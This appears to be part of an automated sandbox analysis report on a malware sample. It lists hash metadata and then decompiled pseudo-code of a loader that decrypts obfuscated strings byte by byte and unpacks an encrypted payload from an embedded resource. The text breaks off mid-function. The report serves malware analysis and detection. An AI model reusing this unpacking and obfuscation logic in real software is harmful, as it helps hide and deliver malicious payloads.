                                                                                                                        • Instruction ID: 928b8e03e5af301d1921d7be6b214247816fb8f83b530b7bd6374266b7d21f78
                                                                                                                        • Opcode Fuzzy Hash: f81d29383d38cdfd76ae14beef3c68458b3833d8e8ed35933b5b786be0ad4eb9
                                                                                                                        • Instruction Fuzzy Hash: C711DFB5D002898FDB10CF9AD444BDEFBF8AF88224F14856AD56AB7700D374A545CFA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.264514303.00000000016CD000.00000040.00000001.sdmp, Offset: 016CD000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a729387492395078b53c8cdc33f2de1642e6c34f7b1be20c9cdfacc02f0a5910
                                                                                                                        • Instruction ID: e99c846352e5f2e68c42a53beca7938bc6361e4ac3a4b3fc4cdb38d57bd953cb
                                                                                                                        • Opcode Fuzzy Hash: a729387492395078b53c8cdc33f2de1642e6c34f7b1be20c9cdfacc02f0a5910
                                                                                                                        • Instruction Fuzzy Hash: 0C2122B1604240DFDB11CF58D8C0B26BBA1FB88764F24C9BDD94A4B346C336D847CAA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.264514303.00000000016CD000.00000040.00000001.sdmp, Offset: 016CD000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 918b5a484225ea750dc867420c5dc02e162b71f4ae55fd38ff69526cb1fe86f3
                                                                                                                        • Instruction ID: 75856d790478b4b62094b0176fae0e562c4fa52ab528b13093aa2f6dde412857
                                                                                                                        • Opcode Fuzzy Hash: 918b5a484225ea750dc867420c5dc02e162b71f4ae55fd38ff69526cb1fe86f3
                                                                                                                        • Instruction Fuzzy Hash: 71118E75504280DFDB12CF58D9C4B25BB71FB84714F24C6AED8494B756C33AD44ACBA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Non-executed Functions

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.264653044.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 26f3b6d57b25afb57f003b9f7a052e08280445c8373ca9c2c003ae5b64332d57
                                                                                                                        • Instruction ID: a203de559f86ae9f2881fcebefb3b3017697db5112c1d16fa4b810ddc8fd7103
                                                                                                                        • Opcode Fuzzy Hash: 26f3b6d57b25afb57f003b9f7a052e08280445c8373ca9c2c003ae5b64332d57
                                                                                                                        • Instruction Fuzzy Hash: 3D12D8F1C9BF668AE310CF55F8886893B60B745328BD16A08D1619FBD0D7B4296ECF44
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.264653044.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c5dad2459ef72931c90ac01e667e793250a1757734b27b8ba64db34409fe616e
                                                                                                                        • Instruction ID: 362b8dfed8da87933be8c715bd5a906eacfc14fe097f9e3205cbcfb332a2f305
                                                                                                                        • Opcode Fuzzy Hash: c5dad2459ef72931c90ac01e667e793250a1757734b27b8ba64db34409fe616e
                                                                                                                        • Instruction Fuzzy Hash: D2A15A32E10609CFCF16DFA5C8545EEBBB2FF85304B15856AE806AB221EB31AD15CF50
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.264653044.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b0b76390a66f3bbc506e16246191e3be2ead7bd321cc6341730e483af23fc48e
                                                                                                                        • Instruction ID: 91d2bd1cb47660ec955879ce768bae21a94d193672ffbdcd15ab9147cd960a09
                                                                                                                        • Opcode Fuzzy Hash: b0b76390a66f3bbc506e16246191e3be2ead7bd321cc6341730e483af23fc48e
                                                                                                                        • Instruction Fuzzy Hash: 51C119F1C96F668BD710CF65F8882893B61BB85328FD15B08D161AB7D0D7B4286ACF44
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Executed Functions

                                                                                                                        C-Code - Quality: 90%
                                                                                                                        			E00401470(void* __ebx, void* __edx, void* __eflags) {
                                                                                                                        				intOrPtr _v8;
                                                                                                                        				char _v40;
                                                                                                                        				char _v44;
                                                                                                                        				char _v45;
                                                                                                                        				char _v46;
                                                                                                                        				char _v47;
                                                                                                                        				char _v48;
                                                                                                                        				char _v49;
                                                                                                                        				char _v50;
                                                                                                                        				char _v51;
                                                                                                                        				char _v52;
                                                                                                                        				char _v53;
                                                                                                                        				char _v54;
                                                                                                                        				char _v55;
                                                                                                                        				char _v56;
                                                                                                                        				char _v57;
                                                                                                                        				char _v58;
                                                                                                                        				char _v59;
                                                                                                                        				char _v60;
                                                                                                                        				char _v61;
                                                                                                                        				char _v62;
                                                                                                                        				char _v63;
                                                                                                                        				char _v64;
                                                                                                                        				char _v65;
                                                                                                                        				char _v66;
                                                                                                                        				char _v67;
                                                                                                                        				char _v68;
                                                                                                                        				char _v69;
                                                                                                                        				char _v70;
                                                                                                                        				char _v71;
                                                                                                                        				char _v72;
                                                                                                                        				char _v73;
                                                                                                                        				char _v74;
                                                                                                                        				char _v75;
                                                                                                                        				char _v76;
                                                                                                                        				struct HINSTANCE__* _v80;
                                                                                                                        				void* _v84;
                                                                                                                        				char _v116;
                                                                                                                        				signed int _v120;
                                                                                                                        				struct HRSRC__* _v124;
                                                                                                                        				char _v128;
                                                                                                                        				char _v129;
                                                                                                                        				char _v130;
                                                                                                                        				char _v131;
                                                                                                                        				char _v132;
                                                                                                                        				char _v133;
                                                                                                                        				char _v134;
                                                                                                                        				char _v135;
                                                                                                                        				char _v136;
                                                                                                                        				char _v137;
                                                                                                                        				char _v138;
                                                                                                                        				char _v139;
                                                                                                                        				char _v140;
                                                                                                                        				char _v141;
                                                                                                                        				char _v142;
                                                                                                                        				char _v143;
                                                                                                                        				char _v144;
                                                                                                                        				char _v145;
                                                                                                                        				char _v146;
                                                                                                                        				char _v147;
                                                                                                                        				char _v148;
                                                                                                                        				char _v149;
                                                                                                                        				char _v150;
                                                                                                                        				char _v151;
                                                                                                                        				char _v152;
                                                                                                                        				char _v153;
                                                                                                                        				char _v154;
                                                                                                                        				char _v155;
                                                                                                                        				char _v156;
                                                                                                                        				char _v157;
                                                                                                                        				char _v158;
                                                                                                                        				char _v159;
                                                                                                                        				char _v160;
                                                                                                                        				intOrPtr _v164;
                                                                                                                        				long _v168;
                                                                                                                        				void* _v172;
                                                                                                                        				intOrPtr _v176;
                                                                                                                        				intOrPtr _v180;
                                                                                                                        				signed int _v181;
                                                                                                                        				int _v188;
                                                                                                                        				char _v192;
                                                                                                                        				char _v193;
                                                                                                                        				char _v194;
                                                                                                                        				char _v195;
                                                                                                                        				char _v196;
                                                                                                                        				char _v197;
                                                                                                                        				char _v198;
                                                                                                                        				char _v199;
                                                                                                                        				char _v200;
                                                                                                                        				char _v201;
                                                                                                                        				char _v202;
                                                                                                                        				char _v203;
                                                                                                                        				char _v204;
                                                                                                                        				char _v205;
                                                                                                                        				char _v206;
                                                                                                                        				char _v207;
                                                                                                                        				char _v208;
                                                                                                                        				char _v209;
                                                                                                                        				char _v210;
                                                                                                                        				char _v211;
                                                                                                                        				char _v212;
                                                                                                                        				char _v213;
                                                                                                                        				char _v214;
                                                                                                                        				char _v215;
                                                                                                                        				char _v216;
                                                                                                                        				char _v217;
                                                                                                                        				char _v218;
                                                                                                                        				char _v219;
                                                                                                                        				char _v220;
                                                                                                                        				char _v221;
                                                                                                                        				char _v222;
                                                                                                                        				char _v223;
                                                                                                                        				char _v224;
                                                                                                                        				intOrPtr _v228;
                                                                                                                        				struct HINSTANCE__* _v760;
                                                                                                                        				char _v792;
                                                                                                                        				char _v796;
                                                                                                                        				struct HINSTANCE__* _v800;
                                                                                                                        				char _v940;
                                                                                                                        				char _v944;
                                                                                                                        				char _v945;
                                                                                                                        				char _v946;
                                                                                                                        				char _v947;
                                                                                                                        				char _v948;
                                                                                                                        				char _v949;
                                                                                                                        				char _v950;
                                                                                                                        				char _v951;
                                                                                                                        				char _v952;
                                                                                                                        				char _v953;
                                                                                                                        				char _v954;
                                                                                                                        				char _v955;
                                                                                                                        				char _v956;
                                                                                                                        				char _v957;
                                                                                                                        				char _v958;
                                                                                                                        				char _v959;
                                                                                                                        				char _v960;
                                                                                                                        				char _v961;
                                                                                                                        				char _v962;
                                                                                                                        				char _v963;
                                                                                                                        				char _v964;
                                                                                                                        				char _v965;
                                                                                                                        				char _v966;
                                                                                                                        				char _v967;
                                                                                                                        				char _v968;
                                                                                                                        				char _v969;
                                                                                                                        				char _v970;
                                                                                                                        				char _v971;
                                                                                                                        				char _v972;
                                                                                                                        				char _v973;
                                                                                                                        				char _v974;
                                                                                                                        				char _v975;
                                                                                                                        				char _v976;
                                                                                                                        				signed int _v977;
                                                                                                                        				int _v984;
                                                                                                                        				struct HINSTANCE__* _v988;
                                                                                                                        				intOrPtr _v992;
                                                                                                                        				intOrPtr _v996;
                                                                                                                        				intOrPtr _v1000;
                                                                                                                        				void* _v1004;
                                                                                                                        				struct HINSTANCE__* _v1008;
                                                                                                                        				char _v1040;
                                                                                                                        				signed int _v1044;
                                                                                                                        				struct HINSTANCE__* _v1048;
                                                                                                                        				char _v1080;
                                                                                                                        				char _v1604;
                                                                                                                        				void* _v1636;
                                                                                                                        				char _v1640;
                                                                                                                        				char _v1641;
                                                                                                                        				char _v1642;
                                                                                                                        				char _v1643;
                                                                                                                        				char _v1644;
                                                                                                                        				char _v1645;
                                                                                                                        				char _v1646;
                                                                                                                        				char _v1647;
                                                                                                                        				char _v1648;
                                                                                                                        				char _v1649;
                                                                                                                        				char _v1650;
                                                                                                                        				char _v1651;
                                                                                                                        				char _v1652;
                                                                                                                        				char _v1653;
                                                                                                                        				char _v1654;
                                                                                                                        				char _v1655;
                                                                                                                        				char _v1656;
                                                                                                                        				char _v1657;
                                                                                                                        				char _v1658;
                                                                                                                        				char _v1659;
                                                                                                                        				char _v1660;
                                                                                                                        				char _v1661;
                                                                                                                        				char _v1662;
                                                                                                                        				char _v1663;
                                                                                                                        				char _v1664;
                                                                                                                        				char _v1665;
                                                                                                                        				char _v1666;
                                                                                                                        				char _v1667;
                                                                                                                        				char _v1668;
                                                                                                                        				char _v1669;
                                                                                                                        				char _v1670;
                                                                                                                        				char _v1671;
                                                                                                                        				char _v1672;
                                                                                                                        				intOrPtr _v1676;
                                                                                                                        				char _v1680;
                                                                                                                        				char _v1681;
                                                                                                                        				char _v1682;
                                                                                                                        				char _v1683;
                                                                                                                        				char _v1684;
                                                                                                                        				char _v1685;
                                                                                                                        				char _v1686;
                                                                                                                        				char _v1687;
                                                                                                                        				char _v1688;
                                                                                                                        				char _v1689;
                                                                                                                        				char _v1690;
                                                                                                                        				char _v1691;
                                                                                                                        				char _v1692;
                                                                                                                        				char _v1693;
                                                                                                                        				char _v1694;
                                                                                                                        				char _v1695;
                                                                                                                        				char _v1696;
                                                                                                                        				char _v1697;
                                                                                                                        				char _v1698;
                                                                                                                        				char _v1699;
                                                                                                                        				char _v1700;
                                                                                                                        				char _v1701;
                                                                                                                        				char _v1702;
                                                                                                                        				char _v1703;
                                                                                                                        				char _v1704;
                                                                                                                        				char _v1705;
                                                                                                                        				char _v1706;
                                                                                                                        				char _v1707;
                                                                                                                        				char _v1708;
                                                                                                                        				char _v1709;
                                                                                                                        				char _v1710;
                                                                                                                        				char _v1711;
                                                                                                                        				char _v1712;
                                                                                                                        				intOrPtr _v1716;
                                                                                                                        				char _v2244;
                                                                                                                        				intOrPtr _v2248;
                                                                                                                        				char _v2280;
                                                                                                                        				signed int _v2284;
                                                                                                                        				struct HINSTANCE__* _v2288;
                                                                                                                        				struct HINSTANCE__* _v2292;
                                                                                                                        				char _v2556;
                                                                                                                        				char _v2588;
                                                                                                                        				char _v2592;
                                                                                                                        				char _v2593;
                                                                                                                        				char _v2594;
                                                                                                                        				char _v2595;
                                                                                                                        				char _v2596;
                                                                                                                        				char _v2597;
                                                                                                                        				char _v2598;
                                                                                                                        				char _v2599;
                                                                                                                        				char _v2600;
                                                                                                                        				char _v2601;
                                                                                                                        				char _v2602;
                                                                                                                        				char _v2603;
                                                                                                                        				char _v2604;
                                                                                                                        				char _v2605;
                                                                                                                        				char _v2606;
                                                                                                                        				char _v2607;
                                                                                                                        				char _v2608;
                                                                                                                        				char _v2609;
                                                                                                                        				char _v2610;
                                                                                                                        				char _v2611;
                                                                                                                        				char _v2612;
                                                                                                                        				char _v2613;
                                                                                                                        				char _v2614;
                                                                                                                        				char _v2615;
                                                                                                                        				char _v2616;
                                                                                                                        				char _v2617;
                                                                                                                        				char _v2618;
                                                                                                                        				char _v2619;
                                                                                                                        				char _v2620;
                                                                                                                        				char _v2621;
                                                                                                                        				char _v2622;
                                                                                                                        				char _v2623;
                                                                                                                        				char _v2624;
                                                                                                                        				signed int _v2628;
                                                                                                                        				intOrPtr _v2632;
                                                                                                                        				signed int _v2636;
                                                                                                                        				intOrPtr* _v3092;
                                                                                                                        				struct HINSTANCE__* _v3096;
                                                                                                                        				char _v3097;
                                                                                                                        				char _v3098;
                                                                                                                        				struct HINSTANCE__* _v3104;
                                                                                                                        				struct HINSTANCE__* _v3108;
                                                                                                                        				intOrPtr* _v3112;
                                                                                                                        				struct HINSTANCE__* _v3116;
                                                                                                                        				char _v3117;
                                                                                                                        				char _v3118;
                                                                                                                        				struct HINSTANCE__* _v3124;
                                                                                                                        				struct HINSTANCE__* _v3128;
                                                                                                                        				intOrPtr* _v3132;
                                                                                                                        				struct HINSTANCE__* _v3136;
                                                                                                                        				char _v3137;
                                                                                                                        				char _v3138;
                                                                                                                        				struct HINSTANCE__* _v3144;
                                                                                                                        				struct HINSTANCE__* _v3148;
                                                                                                                        				intOrPtr* _v3152;
                                                                                                                        				struct HINSTANCE__* _v3156;
                                                                                                                        				char _v3157;
                                                                                                                        				char _v3158;
                                                                                                                        				struct HINSTANCE__* _v3164;
                                                                                                                        				struct HINSTANCE__* _v3168;
                                                                                                                        				struct HINSTANCE__* _v3172;
                                                                                                                        				void* _v3176;
                                                                                                                        				short _v3178;
                                                                                                                        				void* _v3184;
                                                                                                                        				short _v3186;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				void* __ebp;
                                                                                                                        				intOrPtr _t518;
                                                                                                                        				void* _t521;
                                                                                                                        				int _t523;
                                                                                                                        				struct HINSTANCE__* _t534;
                                                                                                                        				signed int _t536;
                                                                                                                        				struct HINSTANCE__* _t547;
                                                                                                                        				CHAR* _t566;
                                                                                                                        				CHAR* _t584;
                                                                                                                        				signed int _t589;
                                                                                                                        				signed int _t592;
                                                                                                                        				signed int _t597;
                                                                                                                        				signed int _t603;
                                                                                                                        				signed int _t610;
                                                                                                                        				intOrPtr* _t618;
                                                                                                                        				intOrPtr* _t621;
                                                                                                                        				int _t624;
                                                                                                                        				intOrPtr* _t626;
                                                                                                                        				struct HINSTANCE__* _t627;
                                                                                                                        				intOrPtr* _t629;
                                                                                                                        				struct HINSTANCE__* _t630;
                                                                                                                        				intOrPtr _t638;
                                                                                                                        				signed int _t651;
                                                                                                                        				intOrPtr _t668;
                                                                                                                        				signed int _t688;
                                                                                                                        				signed int _t696;
                                                                                                                        				struct HINSTANCE__* _t699;
                                                                                                                        				struct HINSTANCE__* _t701;
                                                                                                                        				char _t704;
                                                                                                                        				char _t707;
                                                                                                                        				char _t709;
                                                                                                                        				char _t710;
                                                                                                                        				void* _t711;
                                                                                                                        				struct HRSRC__* _t716;
                                                                                                                        				signed int _t745;
                                                                                                                        				signed int _t747;
                                                                                                                        				char _t756;
                                                                                                                        				char _t759;
                                                                                                                        				intOrPtr _t767;
                                                                                                                        				intOrPtr _t769;
                                                                                                                        				char _t770;
                                                                                                                        				char _t771;
                                                                                                                        				void* _t772;
                                                                                                                        				void* _t779;
                                                                                                                        				void* _t782;
                                                                                                                        				void* _t784;
                                                                                                                        				void* _t787;
                                                                                                                        				void* _t796;
                                                                                                                        				void* _t803;
                                                                                                                        				void* _t804;
                                                                                                                        				void* _t805;
                                                                                                                        
                                                                                                                        				_t805 = __eflags;
                                                                                                                        				_t711 = __edx;
                                                                                                                        				_t643 = __ebx;
                                                                                                                        				_v76 = 0xe0;
                                                                                                                        				_v75 = 0x3b;
                                                                                                                        				_v74 = 0x8d;
                                                                                                                        				_v73 = 0x2a;
                                                                                                                        				_v72 = 0xa2;
                                                                                                                        				_v71 = 0x2a;
                                                                                                                        				_v70 = 0x2a;
                                                                                                                        				_v69 = 0x41;
                                                                                                                        				_v68 = 0xd3;
                                                                                                                        				_v67 = 0x20;
                                                                                                                        				_v66 = 0x64;
                                                                                                                        				_v65 = 6;
                                                                                                                        				_v64 = 0x8a;
                                                                                                                        				_v63 = 0xf7;
                                                                                                                        				_v62 = 0x3d;
                                                                                                                        				_v61 = 0x9d;
                                                                                                                        				_v60 = 0xd9;
                                                                                                                        				_v59 = 0xee;
                                                                                                                        				_v58 = 0x15;
                                                                                                                        				_v57 = 0x68;
                                                                                                                        				_v56 = 0xf4;
                                                                                                                        				_v55 = 0x76;
                                                                                                                        				_v54 = 0xb9;
                                                                                                                        				_v53 = 0x34;
                                                                                                                        				_v52 = 0xbf;
                                                                                                                        				_v51 = 0x1e;
                                                                                                                        				_v50 = 0xe7;
                                                                                                                        				_v49 = 0x78;
                                                                                                                        				_v48 = 0x98;
                                                                                                                        				_v47 = 0xe9;
                                                                                                                        				_v46 = 0x6f;
                                                                                                                        				_v45 = 0xb4;
                                                                                                                        				_v44 = 0;
                                                                                                                        				_push(E00402AB0( &_v76,  &_v40));
                                                                                                                        				_t518 = E0040EAB4(__ebx, _t711, _t772, _t779, _t805);
                                                                                                                        				_t784 = _t782 + 0xc;
                                                                                                                        				_v8 = _t518;
                                                                                                                        				if(_v8 == "0x1") {
                                                                                                                        					__eflags = 0;
                                                                                                                        					return 0;
                                                                                                                        				}
                                                                                                                        				_t521 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
                                                                                                                        				_v172 = _t521;
                                                                                                                        				_v1636 = 0x224;
                                                                                                                        				_v976 = 0xce;
                                                                                                                        				_v975 = 0x27;
                                                                                                                        				_v974 = 0x9c;
                                                                                                                        				_v973 = 0x1a;
                                                                                                                        				_v972 = 0x95;
                                                                                                                        				_v971 = 0x2e;
                                                                                                                        				_v970 = 0x22;
                                                                                                                        				_v969 = 0x57;
                                                                                                                        				_v968 = 0x91;
                                                                                                                        				_v967 = 0x21;
                                                                                                                        				_v966 = 0x57;
                                                                                                                        				_v965 = 0x3a;
                                                                                                                        				_v964 = 0xf8;
                                                                                                                        				_v963 = 0x98;
                                                                                                                        				_v962 = 0x5b;
                                                                                                                        				_v961 = 0xf4;
                                                                                                                        				_v960 = 0xb5;
                                                                                                                        				_v959 = 0x87;
                                                                                                                        				_v958 = 0x7b;
                                                                                                                        				_v957 = 0xf;
                                                                                                                        				_v956 = 0xf4;
                                                                                                                        				_v955 = 0x76;
                                                                                                                        				_v954 = 0xb9;
                                                                                                                        				_v953 = 0x34;
                                                                                                                        				_v952 = 0xbf;
                                                                                                                        				_v951 = 0x1e;
                                                                                                                        				_v950 = 0xe7;
                                                                                                                        				_v949 = 0x78;
                                                                                                                        				_v948 = 0x98;
                                                                                                                        				_v947 = 0xe9;
                                                                                                                        				_v946 = 0x6f;
                                                                                                                        				_v945 = 0xb4;
                                                                                                                        				_v944 = 0;
                                                                                                                        				_v1712 = 0xc0;
                                                                                                                        				_v1711 = 0x38;
                                                                                                                        				_v1710 = 0x8d;
                                                                                                                        				_v1709 = 0x1f;
                                                                                                                        				_v1708 = 0x8e;
                                                                                                                        				_v1707 = 0x30;
                                                                                                                        				_v1706 = 0x65;
                                                                                                                        				_v1705 = 0x47;
                                                                                                                        				_v1704 = 0xd3;
                                                                                                                        				_v1703 = 0x29;
                                                                                                                        				_v1702 = 0x3b;
                                                                                                                        				_v1701 = 0x56;
                                                                                                                        				_v1700 = 0xf8;
                                                                                                                        				_v1699 = 0x98;
                                                                                                                        				_v1698 = 0x5b;
                                                                                                                        				_v1697 = 0xf4;
                                                                                                                        				_v1696 = 0xb5;
                                                                                                                        				_v1695 = 0x87;
                                                                                                                        				_v1694 = 0x7b;
                                                                                                                        				_v1693 = 0xf;
                                                                                                                        				_v1692 = 0xf4;
                                                                                                                        				_v1691 = 0x76;
                                                                                                                        				_v1690 = 0xb9;
                                                                                                                        				_v1689 = 0x34;
                                                                                                                        				_v1688 = 0xbf;
                                                                                                                        				_v1687 = 0x1e;
                                                                                                                        				_v1686 = 0xe7;
                                                                                                                        				_v1685 = 0x78;
                                                                                                                        				_v1684 = 0x98;
                                                                                                                        				_v1683 = 0xe9;
                                                                                                                        				_v1682 = 0x6f;
                                                                                                                        				_v1681 = 0xb4;
                                                                                                                        				_v1680 = 0;
                                                                                                                        				_t523 = Module32First(_v172,  &_v1636); // executed
                                                                                                                        				if(_t523 == 0) {
                                                                                                                        					L40:
                                                                                                                        					FindCloseChangeNotification(_v172); // executed
                                                                                                                        					_v800 = GetModuleHandleA(0);
                                                                                                                        					_v160 = 0xfc;
                                                                                                                        					_v159 = 0xb;
                                                                                                                        					_v158 = 0xff;
                                                                                                                        					_v157 = 0x75;
                                                                                                                        					_v156 = 0xe7;
                                                                                                                        					_v155 = 0x44;
                                                                                                                        					_v154 = 0x4b;
                                                                                                                        					_v153 = 0x23;
                                                                                                                        					_v152 = 0xbf;
                                                                                                                        					_v151 = 0x45;
                                                                                                                        					_v150 = 0x3b;
                                                                                                                        					_v149 = 0x56;
                                                                                                                        					_v148 = 0xf8;
                                                                                                                        					_v147 = 0x98;
                                                                                                                        					_v146 = 0x5b;
                                                                                                                        					_v145 = 0xf4;
                                                                                                                        					_v144 = 0xb5;
                                                                                                                        					_v143 = 0x87;
                                                                                                                        					_v142 = 0x7b;
                                                                                                                        					_v141 = 0xf;
                                                                                                                        					_v140 = 0xf4;
                                                                                                                        					_v139 = 0x76;
                                                                                                                        					_v138 = 0xb9;
                                                                                                                        					_v137 = 0x34;
                                                                                                                        					_v136 = 0xbf;
                                                                                                                        					_v135 = 0x1e;
                                                                                                                        					_v134 = 0xe7;
                                                                                                                        					_v133 = 0x78;
                                                                                                                        					_v132 = 0x98;
                                                                                                                        					_v131 = 0xe9;
                                                                                                                        					_v130 = 0x6f;
                                                                                                                        					_v129 = 0xb4;
                                                                                                                        					_v128 = 0;
                                                                                                                        					_v124 = FindResourceA(_v800, E00402AB0( &_v160,  &_v2280), 0xa);
                                                                                                                        					_v1004 = LoadResource(_v800, _v124);
                                                                                                                        					_v84 = LockResource(_v1004);
                                                                                                                        					_v988 = 0;
                                                                                                                        					_t534 = E0040DFE9(_t643, _v800, _t772, SizeofResource(_v800, _v124)); // executed
                                                                                                                        					_v988 = _t534;
                                                                                                                        					_v2632 = 0x40022;
                                                                                                                        					_push(_v2632); // executed
                                                                                                                        					_t536 = E0040E9C8(_t643, _v800, _t772, __eflags); // executed
                                                                                                                        					_t787 = _t784 + 0x10;
                                                                                                                        					_v2636 = _t536;
                                                                                                                        					__eflags = _v2636;
                                                                                                                        					if(_v2636 == 0) {
                                                                                                                        						_v3172 = 0;
                                                                                                                        					} else {
                                                                                                                        						E0040E430(_t772, _v2636, 0, _v2632);
                                                                                                                        						_t787 = _t787 + 0xc;
                                                                                                                        						_v3172 = _v2636;
                                                                                                                        					}
                                                                                                                        					_v760 = _v3172;
                                                                                                                        					E00402760(_v760);
                                                                                                                        					_t716 = _v124;
                                                                                                                        					_v120 = SizeofResource(_v800, _t716);
                                                                                                                        					_v2284 = 0;
                                                                                                                        					while(1) {
                                                                                                                        						asm("cdq");
                                                                                                                        						__eflags = _v2284 - _v120 + (_t716 & 0x000003ff) >> 0xa;
                                                                                                                        						if(_v2284 >= _v120 + (_t716 & 0x000003ff) >> 0xa) {
                                                                                                                        							break;
                                                                                                                        						}
                                                                                                                        						_t716 = _v988 + (_v2284 << 0xa);
                                                                                                                        						_push(_t716);
                                                                                                                        						_push(0x400);
                                                                                                                        						_push((_v2284 << 0xa) + _v84);
                                                                                                                        						E004029C0(_t643, _v760);
                                                                                                                        						_t696 = _v2284 + 1;
                                                                                                                        						__eflags = _t696;
                                                                                                                        						_v2284 = _t696;
                                                                                                                        					}
                                                                                                                        					_t651 = _v120 & 0x800003ff;
                                                                                                                        					__eflags = _t651;
                                                                                                                        					if(_t651 < 0) {
                                                                                                                        						_t651 = (_t651 - 0x00000001 | 0xfffffc00) + 1;
                                                                                                                        						__eflags = _t651;
                                                                                                                        					}
                                                                                                                        					__eflags = _t651;
                                                                                                                        					if(_t651 > 0) {
                                                                                                                        						_t745 = _v120 & 0x800003ff;
                                                                                                                        						__eflags = _t745;
                                                                                                                        						if(_t745 < 0) {
                                                                                                                        							_t745 = (_t745 - 0x00000001 | 0xfffffc00) + 1;
                                                                                                                        							__eflags = _t745;
                                                                                                                        						}
                                                                                                                        						_push(_v120 - _t745 + _v988);
                                                                                                                        						_t688 = _v120 & 0x800003ff;
                                                                                                                        						__eflags = _t688;
                                                                                                                        						if(_t688 < 0) {
                                                                                                                        							_t688 = (_t688 - 0x00000001 | 0xfffffc00) + 1;
                                                                                                                        							__eflags = _t688;
                                                                                                                        						}
                                                                                                                        						_push(_t688);
                                                                                                                        						_t747 = _v120 & 0x800003ff;
                                                                                                                        						__eflags = _t747;
                                                                                                                        						if(_t747 < 0) {
                                                                                                                        							_t747 = (_t747 - 0x00000001 | 0xfffffc00) + 1;
                                                                                                                        							__eflags = _t747;
                                                                                                                        						}
                                                                                                                        						_t610 = _v120 - _t747 + _v84;
                                                                                                                        						__eflags = _t610;
                                                                                                                        						_push(_t610);
                                                                                                                        						E004029C0(_t643, _v760);
                                                                                                                        					}
                                                                                                                        					E0040E430(_t772, _v84, 0, _v120);
                                                                                                                        					FreeResource(_v1004);
                                                                                                                        					_v80 = 0;
                                                                                                                        					_v984 = _v988->i;
                                                                                                                        					_v188 = _v984;
                                                                                                                        					_t547 = E0040DFE9(_t643, _v988->i, _t772, _v188); // executed
                                                                                                                        					_v80 = _t547;
                                                                                                                        					_v1676 = E0040DE30(_v80,  &_v188, _v988 + 4, SizeofResource(_v800, _v124));
                                                                                                                        					_v1048 = _v80;
                                                                                                                        					E0040E430(_t772, _v988, 0, _v120);
                                                                                                                        					_v168 = 0x105;
                                                                                                                        					_push(_v1048);
                                                                                                                        					_v180 = E00405550();
                                                                                                                        					E0040E430(_t772, _v1048, 0, _v188);
                                                                                                                        					_push(_v80);
                                                                                                                        					E0040E815(_t643, _t772, _t779, __eflags);
                                                                                                                        					 *0x4237b4 = _v180;
                                                                                                                        					_v1000 = _v180;
                                                                                                                        					_v2248 =  *((intOrPtr*)(_v1000 + 0x3c)) + _v1000;
                                                                                                                        					_v228 =  *((intOrPtr*)(_v2248 + 0xe8));
                                                                                                                        					_v996 = _v1000 + _v228;
                                                                                                                        					_v1716 =  *((intOrPtr*)(_v996 + 8));
                                                                                                                        					_v992 = _v1000 + _v1716;
                                                                                                                        					_v164 = _v992 + 0x10;
                                                                                                                        					_v1672 = 0xce;
                                                                                                                        					_v1671 = 0x27;
                                                                                                                        					_v1670 = 0x9c;
                                                                                                                        					_v1669 = 0x1a;
                                                                                                                        					_v1668 = 0x95;
                                                                                                                        					_v1667 = 0x21;
                                                                                                                        					_v1666 = 0x2e;
                                                                                                                        					_v1665 = 0xd;
                                                                                                                        					_v1664 = 0xdb;
                                                                                                                        					_v1663 = 0x29;
                                                                                                                        					_v1662 = 0x57;
                                                                                                                        					_v1661 = 0x56;
                                                                                                                        					_v1660 = 0xf8;
                                                                                                                        					_v1659 = 0x98;
                                                                                                                        					_v1658 = 0x5b;
                                                                                                                        					_v1657 = 0xf4;
                                                                                                                        					_v1656 = 0xb5;
                                                                                                                        					_v1655 = 0x87;
                                                                                                                        					_v1654 = 0x7b;
                                                                                                                        					_v1653 = 0xf;
                                                                                                                        					_v1652 = 0xf4;
                                                                                                                        					_v1651 = 0x76;
                                                                                                                        					_v1650 = 0xb9;
                                                                                                                        					_v1649 = 0x34;
                                                                                                                        					_v1648 = 0xbf;
                                                                                                                        					_v1647 = 0x1e;
                                                                                                                        					_v1646 = 0xe7;
                                                                                                                        					_v1645 = 0x78;
                                                                                                                        					_v1644 = 0x98;
                                                                                                                        					_v1643 = 0xe9;
                                                                                                                        					_v1642 = 0x6f;
                                                                                                                        					_v1641 = 0xb4;
                                                                                                                        					_v1640 = 0;
                                                                                                                        					_v1008 = LoadLibraryA(E00402AB0( &_v1672,  &_v1040));
                                                                                                                        					_v224 = 0xe0;
                                                                                                                        					_v223 = 0x18;
                                                                                                                        					_v222 = 0xad;
                                                                                                                        					_v221 = 0x36;
                                                                                                                        					_v220 = 0x95;
                                                                                                                        					_v219 = 0x21;
                                                                                                                        					_v218 = 0x2a;
                                                                                                                        					_v217 = 0x57;
                                                                                                                        					_v216 = 0xda;
